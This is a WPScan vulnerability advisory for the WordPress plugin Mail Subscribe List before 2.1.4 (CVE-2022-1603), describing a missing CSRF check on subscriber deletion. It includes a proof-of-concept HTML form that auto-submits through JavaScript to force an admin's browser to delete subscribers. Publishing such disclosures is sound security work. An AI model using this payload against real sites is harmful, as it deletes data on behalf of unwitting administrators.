WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Mail Subscribe List < 2.1.4 - Arbitrary Subscribed User Deletion via CSRF

Description

The plugin does not have CSRF check in place when deleting subscribed users, which could allow attackers to make a logged in admin perform such action and delete arbitrary users from the subscribed list

Proof of Concept

<form id="test" action="https://example.com/wp-admin/admin.php?page=mail-subscribe-list/index.php" method="POST">
    <input type="text" name="sml_remove" value="1">
    <input type="text" name="rem[]" value="1">
    <input type="text" name="rem[]" value="4">
</form>
<script>
    document.getElementById("test").submit();
</script> 

Affects Plugins

mail-subscribe-list
Fixed in version 2.1.4

References

CVE
CVE-2022-1603

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website
https://daniel-ruf.de
Verified

Yes

WPVDB ID
0e12ba6f-a86f-4cc6-9013-8a15586098d0

Timeline

Publicly Published

2022-05-26 (about 1 years ago)

Added

2022-05-26 (about 1 years ago)

Last Updated

2023-02-22 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceSubmission termsDisclosure policyPrivacy Notice for California Users
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us